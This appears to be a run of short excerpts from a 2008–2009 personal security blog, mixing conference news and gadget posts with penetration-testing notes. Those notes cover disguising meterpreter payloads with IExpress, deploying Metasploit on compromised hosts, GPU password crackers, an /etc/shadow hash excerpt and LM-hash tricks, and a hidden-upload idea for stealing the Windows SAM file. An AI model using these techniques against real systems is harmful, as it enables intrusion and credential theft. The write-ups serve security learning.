Brute force, even though it’s gotten so fast, is still a long way away from cracking long complex passwords. That’s were word lists come in handy. It’s usually the crackers first go-to solution, slam a word list against the hash, if that doesn’t work, try rainbow tables (if they happen to have the tables for that specific hash type), and then the full on brute force. Some would say those first two steps are reversed, and it really is the choice of the the person doing it and the word lists they have to work with.

I recently upgraded my video card and had a rough time finding programs that fit the hype of GPU password cracking, so here is what I found so that you won’t have as hard a time.
Ivan Golubev’s SHA1/MD5/MD4 cracker: http://www.golubev.com/hashgpu.htm
Ivan Golubev’s RAR pass cracker:
http://www.golubev.com/rargpu.htm
CUDA Multiforcer (down at the time of this posting)
http://www.cryptohaze.com/bruteforcers.php
BarsWF - MD5 Cracker:
http://3.14.by/en/md5
GPU MD5 Crack: (Included in BackTrack 4 repos “gpu-md5-crack”)

Update I can’t say with 100% certainty that Nessus ever used NMAP as it’s base scanner, I was going off of memory. I apologize for not being perfect.
Update 2 Since people can’t seem to let it go, I would say that I was totally wrong and the nmap was absolutely never used in nessus ever, but then I would be caught in another absolute that I can’t confirm. According to their wiki, the nmap nasl script were taken out because people were No, I haven’t listened to the latest episode of Securabit in which Paul comes on and talks about Nessus.

Per the best of the best in presenting, what breeds a good presentation slide deck? Simplicity
I want to pose a statement. “Simplicity is Security”. The reason I say this is that this day in age, at least in the US, ‘convenience’ is king. And we try to protect those conveniences with ‘security’. Let me start over a bit, this train of thought all started when I started to explain the insecurities in WiMAX to my wife.

I recently visited Tokyo, Japan. Just as always, my curiosity got the best of me and I started to calculate the population density of the buildings where I was staying. Giving fudge factor of non-populated apartments, I estimated 8,500 families in twelve 15 story buildings, living in a 1.5 mile square piece of land.That’s CRAZY. Mass transit and unrestricted modes of transit are not a whim, they are a requirement. I bet you’re asking how this applies to security, or for that matter computers at all.

When I was in middle school, I told a lie. I was so good at telling lies, and remembering even the infinite details of these lies that I could make them believable. Later in life, I learned that this skill was called “Social Engineering ;-)”, but back to the story; I told everyone that I had won a shopping spree at “Incredible Universe”, now named “Fry’s”. Even the teacher believed me.

Let me preempt this post with the following facts: I am a white male veteran with amazing parents. I went to a good school, and was never under-valued by the people I cared about. I fit no minority profiles in other words. I tell you this so that you can latch on to it as why I don’t understand anything in your rebuttal. But I think this gives me a unique view on the issue.

Looking for local events?
I’ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome http://www.novainfosecportal.com/ which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.
Grecs (follow him on twitter) does an amazing job at keeping it up to date and filled with every event possible. (Subscribe to his google calendar of events, get the RSS feed.

Well, sorta…
I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.
Thanks defintely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.

There are a lot of tools that I find in my endeavors would be really helpful, but can’t find on the net for whatever reason.
A portable version of of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.
A application that can sniff traffic from a specific process. Metasploit’s keylogger is sort of there as it only pulls keys from the process of which it is attached (DLL is to ‘fault’ for this).

Val Smith recently wrote a post on the new Attack Research / carnal0wnage blog titled:
”Security Conferences, pen tests and incident response”
Here are my thoughts on what he wrote:
In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the lime light or to pimp some product/0day. And the second being a lot of the talks are things that most can’t go home / back to work and test out or implement.

I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.
A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back.

I recently posted a blog post to Exotic Liability’s website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your fill of security:
Podcasting: GetMon - http://www.getmon.com/ - This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.

First of all, here is my slide deck from DojoSec with a couple added slides, words, and slight modifications:
From Couch To Career In 80 Hours from Rob Fuller
I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies to getting a job. That, and Matt Johansen beat me to it with his blog post titled: “A lot of Information Security Career Advice”, which I highly recommend you check out and add to your RSS reader.

Dark0perator and I will be giving a workshop at ToorCamp coming up July 2nd-5th:
You can find us on the ToorCamp site: http://www.toorcamp.org/content/W13
Here is the description of our talk, save the bio(s):
The Art of Pivot and Persistence: Shell is only the beginning.
This workshop is based on the assumption that you have some level of access on a target system. From that it is demonstrated how to go from that level of access to taking over the whole company and how to keep that access, surviving reboots, AV scans, and even reimaging.

I highly recommend both of these courses, and the chance to get in front of the instructors and ask questions live is worth it IMHO. So bang on those manager doors and work it out, because seats fill quickly and they are limited. **Check out the [Offensive Security - Instructor Lead Training](http://www.offensive-security.com/ilt.php) page for updated information.**
We are excited to announce our next Offsec Live Classes. Since you asked to be notified of our next dates you will be happy to be among the first to have your teams invited to one of our next classes.

Now, before you get all huffy about the title, it’s not what you think. Keep reading:
It’s been 20 days since I received my Kindle 2 (word of warning, NEVER use USPS. Spend the money; it’s not worth the stress). But enough of lullygaging, let me get straight to it:
Advertised Features: Email DOC, HTML/HTM, JPEG/JPG, GIF, PNG, BMP (Also, everything can be put in a ZIP for one time sending).

Last Friday (March 6th, 2009) I posed the question above. What I got in return was nothing short of amazing, and to tell you the truth, it amazed me how the tally rounded out. I categorized the answers and counted them up (MANAGERS, listen up!):
(12 votes) - Security Fundamentals: This category involves the application of A/V, IDS/IPS, basic safe surfing techniques, least privilege use, and an understanding of phishing.

First I wanted to say, sorry for this and the last installment of Room362 being non-technical. They are topics that I feel strongly about and so felt impelled to share.One of the biggest problems in the world, IMHO, are people who have unfounded hate. This is compounded by the anonymity of the Internet. Allowing that hate to have no reprocussion or identity. Let me also say I have a deep respect for Free Speech, the depths of which I fear, few truly know.

My recent post “OzymanDNS - Tunneling SSH over DNS” caused a good friend, and someone I highly respect in the information security field, Dave Hull from Trusted Signal, to call me out on the ethics of the post.
Instead of lying to you, Dave, and to myself, I did not put any thought into the ethics of the post until Dave brought it up. Well, except for that auto subconscious RIGHT/WRONG check.

Hak5 Episode 504 Shownotes (In the episode I say that it’s cross platform, use the release links for the Windows binaries to get it working on windows or use cygwin)
DISCLAIMER - I IN NO WAY ENDORSE ILLEGAL ACTIVITIES - USE THE FOLLOWING GUIDE IN A TEST ENVIRONMENT OR AT YOUR OWN LEGAL RISK. UPDATE:Thanks to Chris Gates and Robin Wood for pointing me towards a fixed up version of OzymanDNS and a great tutorial: HERE

Update to post: Metasploit Heart’s Microsoft
Ok, so many people had issues with the Vimeo video, that I posted it to youtube in hopes that you’ll be able to play it all the way through. I still have no idea what the issue is, it’s played perfectly on all the computers that I’ve tried it on.

Recently I have been debating on whether to get a Netbook or the Kindle 2. (I am only in this debate because my lovely wife decided to buy a table and chairs, for the house. There is no winning when they buy things for ‘the house’ or ‘the kids’).
Anyways, I tweeted up my dilemma and got a huge amount of responses. They came from both sides of the fence. Some said Kindle and some said Netbook, and they all had good arguments.

Most of you Twitterholics have seen this beautiful status. You get a total of 100 API calls per Twitter account per hour. What happens if you use all of your afforded calls? You can just use http://www.twitter.com/ no problem right? Well you loose a lot of what makes Twitter clients so useful (search, grouping, instant updates.. etc).
Well, what if you leave you client up at home? TweetDeck by itself uses most of the API calls just by itself.

Hiding Meterpreter with IExpress from mubix on Vimeo.
Using the IExpress, a built in tool (XP, not sure about other Windows versions), we package two executables together, so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it’s easyier to dupe, or a different malicious executable (leekspin perhaps?

Official Press Release: February 24th, 2009. Kansas City, MO - The Cowtown Computer Congress (CCCKC) is happy to announce the opening of their Underground Lab to the public with a full week of events Beginning on March 2nd, the grand opening showcase the rich and vibrant community of creative minds in the Kansas City area. CCCKC, the first organization of its kind in the midwest, will serve the community by providing technology classes, donating unique projects to local organizations and technology assistance to those in need.

(This is the 3rd time I am writing this post, FF Fail, then Word crashed, so please excuse the lack of passion)
The moment that PDANet published that they released an updated version that allows USB tethering, I ran home and “QuickPWNd” my phone (which took all 5 minutes). Loaded the app and now I had the coveted TETHERING. I was free of my bind to Comcast or Free Public Wifi.

Let me start off this post by saying that the main focus of any of these competitions is not to win, but to learn. Learning is usually accompanied by tears on the defenders side, but the best way to learn is to fail.
That said though, the title of this post is about how to win:
Planning Phase: This is where you win or lose. If you don’t have a good plan and a good team layout ahead of time, you are screwed.

So here is the deal. I have a ticket to the RSA Conference that is April 20-24 in San Francisco, at Moscone Center. I can’t use it. So I am offering it up as a bribe. Here is the bribe. I need a video of The Middler in action. From start (downloading) to finish (compromise / root / BeEF / owange) of another machine.
The video must be without audio, pausing a bit with each step, and a maximum of 1020 x 720 in resolution preferably in Camtasia Studio format.

It figures that someone who didn’t go actually made a list of tools. (Probably because they didn’t have to suffer the ShmooFlu)
Check out: http://blog.security4all.be/2009/02/shmoocon-2009-overview-collection-of.html Thanks to Security4all for posting it up!
If you see something that he doesn’t have, pictures, videos, links, or tools, please let him know.
FireTalks / PodCasters Meetup audio can be found here soon: http://pcm.libsyn.com/

Metasploit is awesome, but some don’t know that their are updates all the time via SVN, and even fewer know of places to get good non-svn modules / scripts. Here are a few of my favorites:
https://www.securinfos.info/metasploit/msfxdc.php
http://metasploit.com/users/mc/
http://darkoperator.blogspot.com
– newly added, check out the CookieMonster script and a host of others:
http://pentest.cryptocity.net
And of course: http://carnal0wnage.blogspot.com/

I have had the idea for this app for a long time, expressed it a few times, but never really pushed, and I sure that I am not the only one who has thought of or wanted an app like Ear Trumpet by Robin Wood. Well on Jan 21st Sam Buhlig posted to the PaulDotCom mailing list asking for an app to test a firewall that would answer on all ports.

I registered Bobstories.com after listening to PaulDotCom for a while. I have always told stories of this manor, but never quite put a name to “my friend”. Now that he has a name, it is only fitting that he has a domain and a blog. Please, come, register under the name bob_#### with a mailinator address to match, or your own name and email address if you wish. I’ll moderate all posts simply for spam purposes and have them up post haste.

I recently obtained the status Offensive Security Certified Professional. It is one of the best courses I have ever taken. It challenged me to think and learn new skills on the fly. You start the course with a bunch of video files, a huge pdf and an lzm file to get your VPN setup. It is self paced and intense. The topics cover everything from Back|Track basics to the HXDEF rootkit.

First: Using SAMBA to crack Unix passwords
Theory: You compromise a unix host during a pentest and grab /etc/shadow and /etc/password. You take the entries for root in both and drop them into a unix host that you control that is set up with SAMBA to sync authentication. You then use windows methods to extract the LM/NTLM hash from SAMBA.
Problem: SAMBA doesn’t cache the LM/NTLM hash until the correct one is passed to it.

The Full Disclosure mailing list has a long and illustrious past. It has played host to everything from zero days to politics. One thing that has rung true for a number of years, if not since it’s inception is that it is unregulated (save spam of course). However in recent months it has fallen pray to less and less technical discussions, and more bickering, name calling, and outright trolling.
The reason for this post is to let everyone know that has unsubscribed, that a change is coming.

TiVo and DVRs in general have brought TV watching a long way. Some of the innovations that have come of it have made the TV experience better. Commercial skipping is my own personal favorite. But some of the other features are pausing, rewinding, and fast forwarding (after you are behind a bit obviously) and finally recording. Now, recording live TV is nothing new. People have done it since VCRs were invented, and I’m sure much before then.

More information can be found at http://www.podcastersmeetup.com/
But here is the down and dirty: We are sponsored this year by: HP, SunbeltSoftware, DojoSec, and TheAcademyPro / TheAcademyHome solidly so far.
The following podcasts will be making an appearance:
Hak5 PaulDotCom CyberSpeak Securabit SploitCast Unpersons Phone Losers of America SMBMinute And the schedule goes as such:
1700 - 1800 - Meet and greet, and setup (Everyone involved in the live event please show up as close to this start time as possible) 1800 - 1900 - Live Show (This will probably go over time) 1900 - 1930 - Book signing and transition time 1930 - 2030 - FireTalks (more below) 2030 - 0400 - Food and Drinks on us at local spot.

Sponsors: We have had a lot of great response for everyone on this year’s event! I want to reiterate, this event is for podcasters, bloggers, twitter addicts, and everyone in between. I would also like to announce an update to our sponsor’s lineup:
TheAcademyPro.com / TheAcademyHome.com > These are twin sites catering videos to the security pro looking to learn about everything from enterprise gear to Maltego, and the home user trying to start the learning about security and how to secure their own computers without going to you the IT guy in the family.

Table of Contents: Part 1 - Introduction Part 2 - Entities and Transforms Part 3 - The Human Factor Part 4 - Server Time (CTAS, PTTAS, MALTAS, SQLTAS, SNTAS) Part 5 - Hacks, Tips, and Tricks Today we are taking a brief step outside of Maltego and at the end we’ll show how you can use what you have learned to take Maltego to another level. So, without further ado:

SQLi through meta refreshes using cookies or useragents. Making SQLi a client-side attack. How much do you want to bet that the person that visits the site the most is the administrator :)
Javascript adding hidden files upload form fields that are auto populated with C:\Windows\System32\config\SAM or C:\Windows\Repair .. yadada. You get the idea.

Today I was in a brief / talk / meeting and I just wanted to share with you some of the things that I saw in this event that might better help you know what NOT to do while getting up in front of any size crowd.
Death by bullets (Yes this is bulleted to be ironic). But seriously, this was a reoccuring theme throughout the meeting. Try and keep it to 3 or 5.

I believe there is a fear in the security community about speaking. Most don’t believe they either have something important enough to say, or have some awesome ‘thing’ and are just too afraid of the stage. Here are some resources and videos that have helped me gain the confidence to speak.
Gary Vaynerchuck @ Web 2.0 Expo: [http://www.youtube.com/watch?v=EhqZ0RU95d4**](http://www.youtube.com/watch?v=EhqZ0RU95d4)
– Specifically look at how he speaks. How he starts, how he finishes.

This is an untested theory, but I don’t see why it wouldn’t work. Anyone who wants to prove it either way is very welcome to comment on the matter below.
Ok. Say you have the following exerpt from an /etc/shadow file:
root:awac7eQv2CT0g:12685:0:10000:::: billybob:$7$b1XHzqR5$RJxOyHRAix2rVmtXyHkLikmnod.z94P6vSL1h8ZeUdY/urvOvkvJjg2hn/J0r90YAdAA8HedGIPR2D7.zIzJS0:14438:0:99999:7::: Both passwords in clear text are “uncrackable”. Here is where the trick comes into it. We use the weakness in LM hashes to crack the password (as long as it’s under 15 characters of course).

Alright you all have heard of some of the annoying items that make ThinkGeek a one stop shop for cube warfare, such as the Annoy-a-tron and the Phantom Keystroker. Well nothing can hold a candle to the BSODomizer. Along the lines of the Annoy-a-tron and the Phantom Keystroker, this device is hardware and messes with your target on a timer based method. But what gets added to the mix is the fact that it has an IR reciever as well, so while you are giggling in your cube trying not to bust up laughing, you can actually use any Universal Remote set to the Sony TV code, a TV-B-Gone (Mitch Altman’s awesome invention), or even a computer that it set to send that signal from it’s IR port.

Yesterday on Twitter I posed 3 questions:
Question 1: Now that Clickjacking has faded away from “Newest Greatest BAD STUFF”, how many implemented NoScript personally? What about Enterprise wide?
Question 2: Now, everyone who responded that you are still at IE in the enterprise. Why? Did you show the powers that be clickjacking and it’s effects?
Question 3: Ok here is the final question of the trio, Why, since we rely on IE, aren’t we screeming at M$ to implement NoScript-like features?

It’s official Burp Suite 1.2 is officially released to the masses. It includes a whole host of new features. Mainly (the ones spoke of in the blog post about the release):
Site map showing information accumulated about target applications in tree and table form
Suite-level target scope configuration, driving numerous individual tool actions
Display filters on site map and Proxy request history
Suite-wide search function
Support for invisible proxying

It’s not quite the snooze button I asked for, but it will do. Google implemented Gmail Tasks inside of Gmail Labs. Here is the blog post about it: http://gmailblog.blogspot.com/2008/12/new-in-labs-tasks.html

If you haven’t seen it yet, I posted about a Nerv-Labs Live DVD that included all kinds security distros in one bootable DVD. Which was also featured in Episode 0x415 of Hak5. Well, there were some things that it was kinda lacking, mainly Helix and Samurai.
Well, my buddy Marcus Carey from SunTzu Data did it up right. Let me introduce SumoLinux. SumoLinux has the following linux distributions on it:

Guest Article By: Ryan Pfleghaar (post_break) of iamthekiller.net
DEFENDING AGAINST JASAGER
Jasager has been making people question wireless security since episode one of season four on Hak5. The number one question besides “How do I get this to work” is ”How do I protect myself?”. This exploit in wireless security has been somewhat of a challenge to protect against and with this article I am going to detail how Mubix and I came up with a quick and easy fix.

I have had this rant on Twitter (if they had threading I would link to it). I have also had it in person a half dozen times at CSI Annual. And a piece of it was touched on a piece of the puzzle by Jack Daniel on his blog posting “The Fallacy of Penetration Testing”. We as “Security Professionals” have a big problem. We usually don’t have the power to make change.

This is just a quick blurb because Tom from the Security Justice Podcast already has a great post about all the changes:
Check out his post here: http://spylogic.net/item/382
New link: http://www.spylogic.net/2008/12/maltego-201-released/

Gary Vaynerchuk of Wine Library TV made a post about Ego Searching. He describes in this short video that ego searching when you are trying to make a brand is simply caring about your audience:
Now even Leo Laporte, while being interviewed on the Geek Cred podcast said that as a broadcaster (which can be translated into “Content Producer”), your audience is the most important thing and your responsibility is to them.

Unless you have been hiding under a rock, or just started reading this blog today. You have heard about GoPC. I featured it in my USB Goodies 2008 and I love their product. Now that they have entered into a “Strategic Alliance” with a company called ThinLinX. Now, the details of this alliance and the future it holds aren’t clear at the moment. And of course I have my own speculations.

I use gmail. Not really a big admission nor, very hard to find out. But the reason I use it is becasuse of it’s theading and archiving. For me those two abilities are unmatched anywhere else, both Outlook and Thunderbird fail horribly at this.
More to the point, I have reached a certain level of ‘zen’ with my GTD methods on gmail. I am in a constant battle for “Inbox Zero” and have “Starring” extremely useless for me.

Alan posted this about the SBN:
Well there is not much sense keeping it a secret any longer, as others have already blogged on it. The Security Bloggers Network is going Lijit. Working with the folks who bring you Lijit search widgets, the Security Bloggers Network has a new home. You can find site at http://www.securitybloggers.net (thanks to Tyler Reguly of http://www.computerdefense.org) and at http://www.securitybloggersnetwork.com (this may still be resolving).

Update - Shmoocon already had a list: http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates
Go with what your readers want right? Well I have recently been getting a lot of hits on finding room sharing at ShmooCon. I have done this before at cons and I have met some very interesting people. So I created the google group ShmooCon RoomShare. Post that you are looking, post that you have space. It’s all voluntary and you can sign up for email alerts so that you don’t have to check it all the time.

Even if you have been to ShmooCon, something that alludes most con-goers is the Hack or Halo contest. Most of the time you will see it’s organizers at table near the registration desk getting people signed up. What you may not know is how the whole thing goes down. It’s after hours so, you aren’t missing the great content during the day, and it might save you a few dollars of money spending bar time.

Many of you know who operat0r is, Darren in particular since operat0r pulled a magic trick on Darren’s ACER ONE (Archive.org Links) that turned it from brick to badass in less than 5 minutes. But what some of you may not know is that ol’ McCurdy (operat0r) has some other awesome side projects that run the same course as my style of apps. PORTABLE. But these aren’t the standard portable apps that I find on the net.

Ok, it’s not to you, but it is to a good cause. Here is their blurb:
Hackers for Charity helps non-malicious hackers gain valuable job experience by putting them to work on projects for charity. They also build computer classrooms to help children and adults break the cycle of poverty through empowerment training, and feed children with funds raised by sales of Johnny Long’s books.
This month, I thought that it would be fun to partner up with Hackers for Charity in order to raise money for the people of Uganda.

So I have graduated from the black and green standard hacker theme (with forest header) to a much easier to read and iPhone friendly theme. I have also added a few things to the site. Probably the most noticeable is the new logo. The logo was the created by my good friend TestMAD. He is a starving graphic artist that runs the IRC network ThinStack. He also supports a number of other projects like Geekcred, and Wess Tobler’s new project, Unpersons.

Haven’t had enough conferences yet? First, thanks to everyone who entered through email, twitter and commenting on the CSI give away. Second we do have a winner so please stop the flood. But, on to the show.
The SC World Congress, Dec. 9-10, 2008, at the Javits Convention Center in New York is offering a dicount code to all readers of SBN (Security Blogger’s Network). But what is “The SC World Congress” Here is what they say:

What is CSI? This is what CSI says about it:
Security is in transition. There is general agreement that security does not work, but not on how to fix it. CSI 2008 is the only event today that faces the challenge to reconsider security. This year at CSI’s annual event, the most innovative minds in security will grapple with the tough questions, providing a reality-check and alternative to cookie-cutter conferences that merely tweak the status quo.

Hi, and welcome to my trap. I see a ton of searches of just your type on my site on a daily basis. Lets get down to ranting.
Maltego is an awesome tool, it’s also GIVEN AWAY for FREE.. As in beer, which they allow you to use their servers to do your stupid little ego searches on.** STOP TRYING TO STEAL IT.**
Offensive Security 101. This is by far the best course / certification that I have attempted thus far in my career.

Recently there has been a lot of people in my scope that have been wondering about what “hacker” or security related podcasts are out there. iTunes does a horrible job at categorizing anything past “Technology”. That is where Hacker Media.org comes in. Not only can you get the main feed of ALL the hacker/security related podcasts out there, you can get even deeper. Droops, the maintainer of said monster, makes it so you can pick and choose what kind of shows you want to see by having individualized feeds based on categories, and as shows come and go from those categories the feed changes with it.

EDIT: Switching something from “DRAFT” to “PUBLISH” is a really important step. Sorry guys.
Let me preface all of these tools with, the fact that some don’t come “portable”. To make them so, I have dropped the installer / setup file into Universal Extractor and then cleaned up the directory.
PortSwigger’s Burp Suite - http://portswigger.net/suite/
This tool is essential to any web application security guru’s tool belt. If you haven’t used it already it is time to get schooled up on this wreaking ball.

So there I was…
Today I was sitting at home watching Irongeek’s post of John Strand’s talk Defense In Depth is Dead, Long Live Defense In Depth. And I had one really evil thought:
Someone (such as Bob), could sit at an airport. We all do this it isn’t difficult. He could then turn on his laptop and connect it the airport wireless. Another task, difficult for some, but lets go with Bob being able to.

I got an overwhelming response to me stopping the social engineering challenges, which far out-shadows the large response I got against the challenges. In other words, the “AYE”s have it. As soon as my Maltego series comes to a close I will be starting the challenges back up again. Thank you for your support and I look forward to the continuation of the challenges, I really had fun with the first one.

If you haven’t heard already about Jasager.. well you probably don’t read this blog, but for those who want to know a bit more about the history of Jasager - Karma on the Fon, where the project is now, and where it’s headed, then buckle up, and hang on while we first travel down memory lane.
History:
The time was ShmooCon 2006. It was my very first “HACKER” convention. I was there with my buddies from Hak5 and SploitCast.

Well, it’s not the only answer but I will call them that because it’s what worked for me:
Sitting a couple rows down from the line so that no one would see me from the bus line I was targeting, I waited for the bus to come. As soon as it came rolling up and quickly moved into a dash for the door, timing it so that I could cut in line to be the 4th on.

Here is the scenerio:
There is a line of government, and commerical workers that are in line for the bus. The bus is late, and everyone has had a long day of work. Your target is the first person in line. The line is 75 people long for a bus with a max occupancy of 35 people. Your target is the same sex as you and has headphones in their ears.

So there are all kinds of links that I find and queue up to look at but hate keeping them open in tabs, and they aren’t always in Google Reader and I don’t want to spam to twitter, so Mubix’s Links was born. I setup ScribeFire with a new blogspot account and now, no more tabs, it truely feels like an application of GTD. Plus it allows anyone who is interested to follow along via the blogspot feed.

Now that you have had some time to play around with Community Edition or if you were lucky (or rich) enough, the Full version. We are going to start delving into the the pieces of Maltego and then in Part 5 we rip it apart and put it back together for PT-TAS (Penetration Testing - Transform Application Server). I am going to say “investigation” a lot in the coming paragraphs and parts of this article.

Due to a PEBKAC error with the ID 10 T, I have had to retype parts 2 and 3, which were ready to go out the door.
In the mean time while I fix myself, here are a couple sites that can keep you busy:
Search google for exploits:
http://www.exploitsearch.com/
Watch just about any TV show (and some movies) online:
http://www.surfthechannel.com/
Play any NES game online:

So we are taking a short break from my 4 part series on Maltego to bring you a guest post on runtime packers done by your friendly neighborhood Security Shoggoth. Packers are one of those mystical tech items out there that for most people sound too complicated to even look into. What SecShoggoth and I aimed for with this post is to have understandable yet technical and I think he did an awesome job:

First lets outline whats to come:
Table of Contents: Part 1 - Introduction
Part 2 - Entities and Transforms
Part 3 - The Human Factor
Part 4 - Server Time (CTAS, PTTAS, MALTAS, SQLTAS, SNTAS)
Part 5 - Hacks, Tips, and Tricks
**EDIT: This and the following posts are also show notes for the **Season 4 premiere** of **Hak5
So Maltego 2 has been released and all I have to show for it are these images stolen from paterva.

So, instead of doing this the right way, which is submitting a bug report to google, I am going to do this the blogger way:
Publish article to blog about problem in product
Wait for traffic to rise on blog
Become giddy at rise in traffic due to outstanding title
Watch as traffic falls within days
Become angry and write retort (in said blog, still not contacting the company) getting mad about the STILL unfixed problem

Original Article: http://sunbeltblog.blogspot.com/2008/09/how-to-make-notepadexe-malicious-file.html
Archive.org Saved Page
Alex Eckelberry over at Sunbelt got an itch to see which virus vendors were just using packer signatures instead of emulating the defaltion process and detecting the virus inside. This is a shortcut that can yield false positives such as demonstarted in Alex’s experiment, but is done due to the overhead such an undertaking would introduce, I assume, to the client software.
I bring this up here because I recently conducted a somewhat similar test, although I admittedly know very little about packers.

Just like it’s LOVELY auto download feature, Google Chrome slipped in a new version. I was testing out some of the latest and greatest posts of exploits for .27 and they were failing to work. Checked my version and low and behold a new version number was displayed. I didn’t upgrade, all done automagically. (Evilgrade anyone?)
I wonder what will pop on this new version.

For some reason LinkedIn has become unavailable:
Earlier when going to LinkedIn, I was greeted by a wizard saying that they will performing upgrades tonight. I guess they didn’t go as wel as planned. As a security addict though, I always have that sinking feeling when a server is down. Especially one that has personal information about so many people.
Hope it’s nothing
Fear it’s bad
It’s nothing WINS!

As you may have heard me rant and rave about a special USB stick that downloads contact, messaging, and other information from phones just by plugging them in on Episode 5 of Securabit or read about it via an earlier posting on my blog (Crazed Bovine Traversal). A company called Paraben Corporation went out and made it (Motorola and Samsung support only so far)
I first learned about it via CNet’s report “CSI Stick grabs data from cell phones” and you can find it directly on http://csistick.

So there is already an exploit: http://blogs.zdnet.com/security/?p=1843
There are naysayers: http://www.tgdaily.com/content/view/39154/108/
And then there is the truth: http://www.stillsecureafteralltheseyears.com/ashimmy/2008/09/sucking-the-chr.html
I like the design of the tabs and address bar, but I can do that with a theme in firefox. I want my add-ons, even with the memory problems. Chrome is great for Mom and Pap, but for “Internet Power Users” it falls lightyears short on features. So where is the brass tax?

**EDIT: I got to talk about this DVD on the latest episode of **Securabit** (**Episode 9)
Edit 2: There is a cool new Live DVD by the guys at Sun Tzu Data. (Click here for post)
NERV-LABS subsidiary Badfoo.net has released quite the awesome DVD. Now, the lucky few of you who have suffered through my constant microsoft-bashing linux evangelism alright have heard about all the Multiboot LiveDVDs out there. Until now, they have all been booting various generic Linux distro.

Originally posted to the Zero Day blog on Ziff Davis: http://blogs.zdnet.com/security/?p=1735
This article was also referenced in a Dark Reading blog post by John Sawyer: http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=162049
All updates will reside here as I have no control over the article on Ziff Davis.
DEFCON, the 9000+ attendee hacker conference in Vegas has become a sort of hydra conference. It has become more like a global fair than what most people think of conferences; even the badge is highly unique.

So, just monitoring twitter for Defcon tweets and came across this one: Matthewneely status update 878833018
Screencap:
Link to video: HERE
So what is cool about this tool? It generates an SQL injection that skirts the 64k size limit using MS Debugger on the victim end.
And of course the DEFCON 16 via Wired Mag (Artcile)

I recently was Stumbling and happened across the following video. Now, when people use StumbleUpon they are usually bored and aren’t really contributing to the world as we know it. It strikes me as ironic that I found and watched a video like this, via StumbleUpon. I promise, it is well worth the fraction of a wikipedia project cycle you will utilize on it.
My favorite quote out of the whole deal: “Media that is made for you, but does not include you, is not worth sitting still for”

This may not be safe for work, but it’s your call as everyone in my office got quite the kick out of it. Definitely not security related, and loosely tech related (twitter’s use from a mobile). Proceed with caution.

So, according to my iPhone, the DNS servers that it uses is patched. (209.183.33.23 - schinetdns.mycingular.net) However, when I tried to send an image of the doxpara page through email it gave me an SSL error and asked me to accept the certificate…. Um, no thank you. So, for the time being I will not be checking my email for a while, or for that matter anything I need to authenticate with.

It’s almost that time. DefCon is right around the corner and things are coming together nicely. Here is where we stand and a rough schedule of events:
Bloggers welcome. I got a lot of feedback asking if it’s just for “Podcasters” but we would like to invite bloggers to participate as well.
I-Hacked.com and Astaro are our current sponsors, and I am still waiting on confirmation from two others.

So after my last post, which autotwittered, I got a reply from a guy by the name of Frank Eliason, who goes by the handle “ComcastCares” on Twitter. And this is how the converation went:
mubix: Blogged Comcast: The start of a new series http://tinyurl.com/6jrvhe
5 days ago
comcastcares: @mubix I would like to help. Email me *********[snipped]@cable.comcast.com (new email: We_Can_Help@cable.comcast.com)
5 days ago
mubix: @comcastcares it shouldn’t come to the point where you need to help.

So, now that your feed reader is full up of all the DNS problems, I would like to present you with one more tidbit. How many of you have checked your iPhone, Blackberry, or other web enabled mobile device against this vulnerability? I did, and wasn’t happy.
For more information please check out these links:
In depth explination: http://www.mcgrewsecurity.com/?p=151
To check to see if you are vulnerable: http://www.doxpara.com/
http://www.mckeay.net/2008/07/21/patch-dns-now/
http://www.matasano.com/log/mtso/

I am truely getting tired of iPhone “Web Apps”. I created the title like I was going to give them a fair chance, but they truely have ZERO integration into the actual phone. They do have a pretty interface and I have to give props to some of the design developers, but does this seem more of a copout to anyone else?
I’ll give an example. I LOVE Remember the Milk.

Now, I don’t like to publicly bad mouth companies, but at some point, Comcast’s lack of “service” has got to stop. Well, let me rephrase that: Comcast needs to be held accountable for their utter lack of due diligence. I have been a Comcast customer by default ever since they swallowed the portion of Adelphia that held my area. I say this because only recently, have I actually had a choice in the matter.

To All,
Well, this year marks the first annual DEFCON Podcaster’s Meetup, and we will be doing it in STYLE. For those of you who made it out to the second annual Podcaster’s Meetup at ShmooCon, we ran into some hitches (like sound), but as we grow, so do the problems. Let me start off by telling you some sweet news. We are nailing down time in a SkyBox! So we will have plenty of room, piece and quite for recording, and a nice view over the con, plus NO WALKING TO THE PARTY.

Since I wasn’t able to catch the commenter before they went offline I will leave it anonymous but they make a good point about my Crazed Bovine Traversal post:
In response to your “Crazed Bovine Traversal” blog post, a ringtone virus would likely depend upon some sort of code execution bug in the audio parsing code of the mobile device. Propagation could simply be done via text messaging or web site.

On a Dutch news site there was a story about a hacker that stole 50,000 credit cards (well, the information at least) and also stole a prerelease version of Quake Wars. What do you think made the title line? Quake Wars. That puts things in perspective on what is impotant. Big companies like the one that made Quake Wars have the liquid budget to chase this guy down, but the 50,000 individuals don’t.

So, I made a new category basically for posts that I want to keep for myself and also post for other people not to have as hard a time finding: Archiving.
In Ubuntu I have always set a password for root and “su -” up to root to run things that needed root access. Well after watching IronGeek’s latest video on Labrea (click here to watch the video). I gleaned a new way to get to a root prompt without having to set a password and su up each time.

